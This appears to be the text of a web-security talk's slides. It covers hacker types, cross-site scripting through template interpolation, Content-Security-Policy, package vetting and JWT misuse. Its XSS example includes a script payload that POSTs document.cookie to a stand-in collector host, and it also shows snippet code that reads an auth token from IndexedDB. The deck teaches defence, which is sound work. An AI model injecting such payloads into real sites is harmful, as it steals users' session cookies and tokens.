Abdelrahman Awad
Software Engineer @Rasayel. Open-Source contributor.
#fff
White hat
Has permission.
i.e: like penetration testers.
#888
Gray hat
for learning and usually cause no damage, and they might report it to you.
#000
Black hat
for personal gain and because they can.
Most imporantly, why the X?
Because we already have CSS
<h1>Hello {{ audience }}</h1>
audience = "Robusta's Team";
<h1>Hello Robusta's Team</h1>
audience = "<script>alert('EZ clap');</script>";
<h1>
Hello <script>alert('EZ Clap');</script>
</h1>
audience = `<script>
fetch(
'http://mypasswordcollector.com/idiots',
{ method: 'post', body: document.cookie })
</script>`;
And all users' cookies are now being sent to someone else which might contain auth tokens
If you must use them, make sure to sanitize the text before passing it
If you can, make use of `CSP`
"Content-Security-Policy" header allows you to craft specific rules for executing JavaScript
res.set('Content-Security-Policy', "script-src 'self' http://localhost:3000")
🔃 Update packages regularly
🌟 Check Github stars
📈 Check weekly downloads
👀 Check source code
var DBOpenRequest = window.indexedDB.open("appData", 4);
DBOpenRequest.onsuccess = function(event) {
db = DBOpenRequest.result;
var transaction = db.transaction(["authData"], "readwrite");
var objectStore = transaction.objectStore("authData");
var objectStoreRequest = objectStore.get("auth_token");
objectStoreRequest.onsuccess = function(event) {
// send this to server
objectStoreRequest.result;
};
};
Worst offender: Encoding user info in JWT tokens and decoding them on the FE to get user identity
The fix: Treat the JWT as an opaque value, don't assume it has any useful information, it's just a pass you show to your API
By Abdelrahman Awad